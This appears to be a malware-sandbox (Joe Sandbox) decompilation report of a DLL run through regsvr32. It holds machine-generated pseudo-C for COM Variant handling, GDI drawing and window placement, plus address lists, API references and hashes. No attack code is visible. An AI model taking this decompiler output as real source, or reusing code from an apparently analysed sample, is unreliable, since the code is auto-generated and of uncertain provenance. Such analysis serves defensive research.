                                                                        													__ebx = __ebx + __edi;
                                                                        													__eax =  *__ebx;
                                                                        													_push(__eax);
                                                                        													 *(__ebp - 0x18) = __eax;
                                                                        													__imp__#2();
                                                                        													__eflags =  *(__ebp - 0x18);
                                                                        													 *__esi = __eax;
                                                                        													if( *(__ebp - 0x18) != 0) {
                                                                        														__eflags = __eax;
                                                                        														if(__eax == 0) {
                                                                        															goto L25;
                                                                        														}
                                                                        													}
                                                                        													goto L38;
                                                                        												case 6:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													 *__ebx =  ~( *__ebx);
                                                                        													asm("sbb eax, eax");
                                                                        													L16:
                                                                        													 *_t246 = _t210;
                                                                        													goto L38;
                                                                        												case 7:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                        													__edi =  *(__ebp - 0x10);
                                                                        													__ebx = __ebx + 4;
                                                                        													__esi =  *__ebx;
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													__esi =  *(__ebp - 0x18);
                                                                        													_push(4);
                                                                        													_pop(__edi);
                                                                        													goto L38;
                                                                        												case 8:
                                                                        													L26:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													__eax =  *__ebx;
                                                                        													__eflags = __eax;
                                                                        													 *(__ebp - 0x18) = __eax;
                                                                        													if(__eax != 0) {
                                                                        														__eax = lstrlenA( *(__ebp - 0x18));
                                                                        														__eax = __eax + 1;
                                                                        														 *(__ebp - 0x24) = __eax;
                                                                        														__eax = __eax + __eax;
                                                                        														__eax = __eax + 3;
                                                                        														__eax = __eax & 0xfffffffc;
                                                                        														__eflags = __eax;
                                                                        														__eax = __esp;
                                                                        														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
                                                                        													}
                                                                        													_push(__eax);
                                                                        													__imp__#2();
                                                                        													__eflags =  *(__ebp - 0x18);
                                                                        													 *__esi = __eax;
                                                                        													if( *(__ebp - 0x18) != 0) {
                                                                        														__eflags = __eax;
                                                                        														if(__eax == 0) {
                                                                        															L25:
                                                                        															__eax = E1001CE3B(__ecx);
                                                                        															goto L26;
                                                                        														}
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x10);
                                                                        													 *( *(__ebp - 0x10)) = 8;
                                                                        													goto L38;
                                                                        												case 9:
                                                                        													goto L38;
                                                                        												case 0xa:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													 *__esi =  *__ebx;
                                                                        													goto L38;
                                                                        												case 0xb:
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__eax =  *(__ebp + 0x1c) + 8;
                                                                        													__ecx =  *__eax;
                                                                        													 *(__ebp + 0x1c) = __eax;
                                                                        													__ebx = __ebx + 8;
                                                                        													L22:
                                                                        													 *__esi = __ecx;
                                                                        													__esi[4] = __eax;
                                                                        													goto L38;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								L38:
                                                                        								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
                                                                        								_t246 = _t246 - 0x10;
                                                                        								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
                                                                        								 *(_t247 - 0x18) = _t246;
                                                                        							} while ( *( *(_t247 - 0x14)) != 0);
                                                                        							_t235 =  *(_t247 + 0x18);
                                                                        							_t214 = 0;
                                                                        						}
                                                                        					}
                                                                        					_t242 = 0;
                                                                        					E10010592(_t247 - 0x3c);
                                                                        					if( *(_t247 + 0x10) != _t214) {
                                                                        						_t242 = _t247 - 0x3c;
                                                                        					}
                                                                        					E10011C50(_t247 - 0x6c, _t214, 0x20);
                                                                        					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
                                                                        					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
                                                                        					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
                                                                        					_t172 =  *(_t247 - 0x44);
                                                                        					if(_t172 != _t214) {
                                                                        						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
                                                                        						_t242 = _t235;
                                                                        						if( *_t235 != 0) {
                                                                        							do {
                                                                        								_t192 =  *_t242;
                                                                        								if(_t192 == 8 || _t192 == 0xe) {
                                                                        									__imp__#9(_t214);
                                                                        								}
                                                                        								_t214 = _t214 - 0x10;
                                                                        								_t242 = _t242 + 1;
                                                                        								_t273 =  *_t242;
                                                                        							} while ( *_t242 != 0);
                                                                        						}
                                                                        					}
                                                                        					_push( *((intOrPtr*)(_t247 - 0x4c)));
                                                                        					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
                                                                        					_pop(_t221);
                                                                        					if( *(_t247 + 0x18) >= 0) {
                                                                        						L63:
                                                                        						_t242 =  *(_t247 + 0x10);
                                                                        						__eflags = _t242;
                                                                        						if(_t242 != 0) {
                                                                        							__eflags = _t242 - 0xc;
                                                                        							if(_t242 != 0xc) {
                                                                        								_t174 = _t247 - 0x3c;
                                                                        								__imp__#12(_t174, _t174, 0, _t242);
                                                                        								_t236 = _t174;
                                                                        								__eflags = _t236;
                                                                        								if(_t236 < 0) {
                                                                        									__imp__#9(_t247 - 0x3c);
                                                                        									_push(_t236);
                                                                        									goto L67;
                                                                        								}
                                                                        							}
                                                                        							goto L68;
                                                                        						}
                                                                        					} else {
                                                                        						__imp__#9(_t247 - 0x3c);
                                                                        						if( *(_t247 + 0x18) == 0x80020009) {
                                                                        							__eflags =  *(_t247 - 0x54);
                                                                        							if( *(_t247 - 0x54) != 0) {
                                                                        								 *(_t247 - 0x54)(_t247 - 0x6c);
                                                                        							}
                                                                        							_t178 = E1001F77E(0x20);
                                                                        							_pop(_t221);
                                                                        							 *(_t247 + 0x14) = _t178;
                                                                        							__eflags = _t178;
                                                                        							 *(_t247 - 4) = 0;
                                                                        							if(__eflags == 0) {
                                                                        								_t243 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push( *((intOrPtr*)(_t247 - 0x6c)));
                                                                        								_t221 = _t178;
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t243 = E10039A54(_t178, __eflags);
                                                                        							}
                                                                        							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
                                                                        							__eflags =  *(_t247 - 0x68);
                                                                        							_t237 = __imp__#6;
                                                                        							if( *(_t247 - 0x68) != 0) {
                                                                        								_t113 = _t243 + 0x18; // 0x18
                                                                        								_t221 = _t113;
                                                                        								E1000860E(_t113,  *(_t247 - 0x68));
                                                                        								 *_t237( *(_t247 - 0x68));
                                                                        							}
                                                                        							__eflags =  *(_t247 - 0x64);
                                                                        							if( *(_t247 - 0x64) != 0) {
                                                                        								_t117 = _t243 + 0xc; // 0xc
                                                                        								_t221 = _t117;
                                                                        								E1000860E(_t117,  *(_t247 - 0x64));
                                                                        								 *_t237( *(_t247 - 0x64));
                                                                        							}
                                                                        							__eflags =  *(_t247 - 0x60);
                                                                        							if( *(_t247 - 0x60) != 0) {
                                                                        								_t121 = _t243 + 0x14; // 0x14
                                                                        								_t221 = _t121;
                                                                        								E1000860E(_t121,  *(_t247 - 0x60));
                                                                        								 *_t237( *(_t247 - 0x60));
                                                                        							}
                                                                        							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
                                                                        							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
                                                                        							 *(_t247 + 0x14) = _t243;
                                                                        							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
                                                                        							goto L63;
                                                                        						} else {
                                                                        							_push( *(_t247 + 0x18));
                                                                        							L67:
                                                                        							E100387D9(_t221);
                                                                        							L68:
                                                                        							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
                                                                        							if(_t161 <= 0x13) {
                                                                        								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
                                                                        									case 0:
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 1:
                                                                        										__ecx =  *(__ebp - 0x34);
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 2:
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 3:
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 4:
                                                                        										__ecx =  *(__ebp - 0x34);
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *__eax =  *(__ebp - 0x34);
                                                                        										__ecx =  *(__ebp - 0x30);
                                                                        										 *(__eax + 4) =  *(__ebp - 0x30);
                                                                        										goto L79;
                                                                        									case 5:
                                                                        										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
                                                                        										_push( *(__ebp - 0x34));
                                                                        										__imp__#6();
                                                                        										goto L79;
                                                                        									case 6:
                                                                        										__ecx =  *(__ebp + 0x14);
                                                                        										__eax = 0;
                                                                        										__eflags =  *(__ebp - 0x34) - __bx;
                                                                        										__eax = 0 | __eflags != 0x00000000;
                                                                        										 *( *(__ebp + 0x14)) = __eflags != 0;
                                                                        										goto L79;
                                                                        									case 7:
                                                                        										__edi =  *(__ebp + 0x14);
                                                                        										__esi = __ebp - 0x3c;
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										goto L79;
                                                                        									case 8:
                                                                        										goto L79;
                                                                        									case 9:
                                                                        										_t161 =  *(_t247 + 0x14);
                                                                        										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
                                                                        										goto L79;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L79:
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
                                                                        				return _t161;
                                                                        			}






































                                                                        0x10039d19
                                                                        0x10039c2e
                                                                        0x10039c2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d20
                                                                        0x10039d24
                                                                        0x10039d27
                                                                        0x10039d2a
                                                                        0x10039d2c
                                                                        0x10039d2d
                                                                        0x10039d2e
                                                                        0x10039d2f
                                                                        0x10039d30
                                                                        0x10039d33
                                                                        0x10039d35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039cba
                                                                        0x10039cba
                                                                        0x10039cbd
                                                                        0x10039cbf
                                                                        0x10039cc1
                                                                        0x10039cc3
                                                                        0x10039cc6
                                                                        0x10039ccb
                                                                        0x10039cd1
                                                                        0x10039cd2
                                                                        0x10039cd5
                                                                        0x10039cd7
                                                                        0x10039cda
                                                                        0x10039cda
                                                                        0x10039ce2
                                                                        0x10039cee
                                                                        0x10039cee
                                                                        0x10039cf3
                                                                        0x10039cf4
                                                                        0x10039cfa
                                                                        0x10039cfe
                                                                        0x10039d00
                                                                        0x10039d02
                                                                        0x10039d04
                                                                        0x10039cb5
                                                                        0x10039cb5
                                                                        0x00000000
                                                                        0x10039cb5
                                                                        0x10039d04
                                                                        0x10039d06
                                                                        0x10039d09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c46
                                                                        0x10039c49
                                                                        0x10039c4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c36
                                                                        0x10039c39
                                                                        0x10039c3c
                                                                        0x10039c3e
                                                                        0x10039c41
                                                                        0x10039c83
                                                                        0x10039c83
                                                                        0x10039c88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c1f
                                                                        0x10039c19
                                                                        0x10039c0e
                                                                        0x10039d69
                                                                        0x10039d69
                                                                        0x10039d6d
                                                                        0x10039d70
                                                                        0x10039d79
                                                                        0x10039d79
                                                                        0x10039d82
                                                                        0x10039d85
                                                                        0x10039d85
                                                                        0x10039bc7
                                                                        0x10039d8b
                                                                        0x10039d8d
                                                                        0x10039d96
                                                                        0x10039d98
                                                                        0x10039d98
                                                                        0x10039da2
                                                                        0x10039daa
                                                                        0x10039dac
                                                                        0x10039dd2
                                                                        0x10039dd5
                                                                        0x10039dda
                                                                        0x10039de5
                                                                        0x10039de9
                                                                        0x10039deb
                                                                        0x10039ded
                                                                        0x10039ded
                                                                        0x10039df1
                                                                        0x10039df8
                                                                        0x10039df8
                                                                        0x10039dfe
                                                                        0x10039e01
                                                                        0x10039e02
                                                                        0x10039e02
                                                                        0x10039ded
                                                                        0x10039deb
                                                                        0x10039e07
                                                                        0x10039e0a
                                                                        0x10039e14
                                                                        0x10039e15
                                                                        0x10039ecc
                                                                        0x10039ecc
                                                                        0x10039ecf
                                                                        0x10039ed2
                                                                        0x10039ed8
                                                                        0x10039edc
                                                                        0x10039ee0
                                                                        0x10039ee5
                                                                        0x10039eeb
                                                                        0x10039eed
                                                                        0x10039eef
                                                                        0x10039ef5
                                                                        0x10039efb
                                                                        0x00000000
                                                                        0x10039efb
                                                                        0x10039eef
                                                                        0x00000000
                                                                        0x10039edc
                                                                        0x10039e1b
                                                                        0x10039e1f
                                                                        0x10039e2c
                                                                        0x10039e36
                                                                        0x10039e39
                                                                        0x10039e3f
                                                                        0x10039e3f
                                                                        0x10039e44
                                                                        0x10039e49
                                                                        0x10039e4a
                                                                        0x10039e4d
                                                                        0x10039e4f
                                                                        0x10039e52
                                                                        0x10039e64
                                                                        0x10039e64
                                                                        0x10039e54
                                                                        0x10039e54
                                                                        0x10039e57
                                                                        0x10039e59
                                                                        0x10039e5a
                                                                        0x10039e60
                                                                        0x10039e60
                                                                        0x10039e66
                                                                        0x10039e6a
                                                                        0x10039e6d
                                                                        0x10039e73
                                                                        0x10039e78
                                                                        0x10039e78
                                                                        0x10039e7b
                                                                        0x10039e83
                                                                        0x10039e83
                                                                        0x10039e85
                                                                        0x10039e88
                                                                        0x10039e8d
                                                                        0x10039e8d
                                                                        0x10039e90
                                                                        0x10039e98
                                                                        0x10039e98
                                                                        0x10039e9a
                                                                        0x10039e9d
                                                                        0x10039ea2
                                                                        0x10039ea2
                                                                        0x10039ea5
                                                                        0x10039ead
                                                                        0x10039ead
                                                                        0x10039eb2
                                                                        0x10039eb8
                                                                        0x10039ec4
                                                                        0x10039ec7
                                                                        0x00000000
                                                                        0x10039e2e
                                                                        0x10039e2e
                                                                        0x10039efc
                                                                        0x10039efc
                                                                        0x10039f01
                                                                        0x10039f04
                                                                        0x10039f0a
                                                                        0x10039f0c
                                                                        0x00000000
                                                                        0x10039f1d
                                                                        0x10039f24
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f7f
                                                                        0x10039f82
                                                                        0x10039f85
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f3c
                                                                        0x10039f3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f46
                                                                        0x10039f49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f29
                                                                        0x10039f2c
                                                                        0x10039f2f
                                                                        0x10039f31
                                                                        0x10039f34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f53
                                                                        0x10039f58
                                                                        0x10039f5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f63
                                                                        0x10039f66
                                                                        0x10039f68
                                                                        0x10039f6c
                                                                        0x10039f6f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f73
                                                                        0x10039f76
                                                                        0x10039f79
                                                                        0x10039f7a
                                                                        0x10039f7b
                                                                        0x10039f7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f13
                                                                        0x10039f19
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f0c
                                                                        0x10039f0a
                                                                        0x10039e2c
                                                                        0x10039e15
                                                                        0x10039f87
                                                                        0x10039f8d
                                                                        0x10039f98

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10039B2B
                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                        • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                        • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                        • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                        • String ID:
                                                                        • API String ID: 344392101-0
                                                                        • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                        • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10033FCE(intOrPtr* __ecx, void* __eflags) {
                                                                        				void* __esi;
                                                                        				void* _t132;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t226;
                                                                        				void* _t229;
                                                                        
                                                                        				E10011BF0(0x1003b231, _t229);
                                                                        				_t226 = __ecx;
                                                                        				 *((intOrPtr*)(_t229 - 0x30)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
                                                                        				 *((intOrPtr*)(_t229 - 0x20)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 2;
                                                                        				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
                                                                        				CopyRect(_t229 - 0x44,  *(_t229 + 8));
                                                                        				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
                                                                        				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
                                                                        				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
                                                                        				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                                                        				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                        				_t235 =  *((intOrPtr*)(_t229 + 0x20));
                                                                        				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
                                                                        					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
                                                                        					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
                                                                        				}
                                                                        				 *((intOrPtr*)(_t229 - 0x18)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
                                                                        				 *((intOrPtr*)(_t229 - 0x10)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 4;
                                                                        				if( *(_t229 + 0x14) != 0) {
                                                                        					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
                                                                        					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
                                                                        					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
                                                                        					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
                                                                        					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
                                                                        					E1001045D(_t229 - 0x24, _t229 - 0x44);
                                                                        					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
                                                                        						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
                                                                        						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
                                                                        					}
                                                                        				}
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
                                                                        					E10028E1A(_t226, _t229 - 0x1c);
                                                                        					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                        					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
                                                                        					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                        					E10029439(_t226,  *(_t229 + 0x14));
                                                                        				}
                                                                        				_t132 = _t229 - 0x14;
                                                                        				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
                                                                        					_t132 = _t229 - 0x34;
                                                                        				}
                                                                        				E10028E1A(_t226, _t132);
                                                                        				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                        				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
                                                                        				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                        				if( *(_t229 + 0x14) != 0) {
                                                                        					E10029439(_t226,  *(_t229 + 0x14));
                                                                        				}
                                                                        				E10028E1A(_t226, 0);
                                                                        				 *(_t229 - 4) = 3;
                                                                        				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x14);
                                                                        				 *(_t229 - 4) = 2;
                                                                        				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x1c);
                                                                        				 *(_t229 - 4) = 1;
                                                                        				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x24);
                                                                        				 *(_t229 - 4) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x2c);
                                                                        				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
                                                                        				_t145 = E100293B4(_t229 - 0x34);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
                                                                        				return _t145;
                                                                        			}

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10033FD3
                                                                          • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                        • CopyRect.USER32 ref: 10034012
                                                                        • InflateRect.USER32(?,?,?), ref: 10034028
                                                                        • IntersectRect.USER32 ref: 10034036
                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                          • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                        • CopyRect.USER32 ref: 100340CC
                                                                        • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                        • IntersectRect.USER32 ref: 100340F0
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                        • String ID:
                                                                        • API String ID: 897514543-0
                                                                        • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                        • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				signed int _v5;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagRECT _v28;
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				struct tagRECT _v80;
                                                                        				char _v100;
                                                                        				intOrPtr _t55;
                                                                        				struct HWND__* _t56;
                                                                        				intOrPtr _t78;
                                                                        				intOrPtr _t90;
                                                                        				signed int _t99;
                                                                        				struct HWND__* _t100;
                                                                        				struct HWND__* _t102;
                                                                        				void* _t104;
                                                                        				long _t110;
                                                                        				void* _t113;
                                                                        				struct HWND__* _t115;
                                                                        				void* _t117;
                                                                        				intOrPtr _t119;
                                                                        				intOrPtr _t123;
                                                                        
                                                                        				_t113 = __edx;
                                                                        				_t119 = __ecx;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = E100202AB(__ecx);
                                                                        				_t55 = _a4;
                                                                        				if(_t55 == 0) {
                                                                        					if((_v5 & 0x00000040) == 0) {
                                                                        						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                                                        					} else {
                                                                        						_t56 = GetParent( *(__ecx + 0x1c));
                                                                        					}
                                                                        					_t115 = _t56;
                                                                        					if(_t115 != 0) {
                                                                        						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                                                        						if(_t100 != 0) {
                                                                        							_t115 = _t100;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t115 =  *(_t55 + 0x1c);
                                                                        				}
                                                                        				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                                                        				if((_v5 & 0x00000040) != 0) {
                                                                        					_t102 = GetParent( *(_t119 + 0x1c));
                                                                        					GetClientRect(_t102,  &_v28);
                                                                        					GetClientRect(_t115,  &_v60);
                                                                        					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                                                        				} else {
                                                                        					if(_t115 != 0) {
                                                                        						_t99 = GetWindowLongA(_t115, 0xfffffff0);
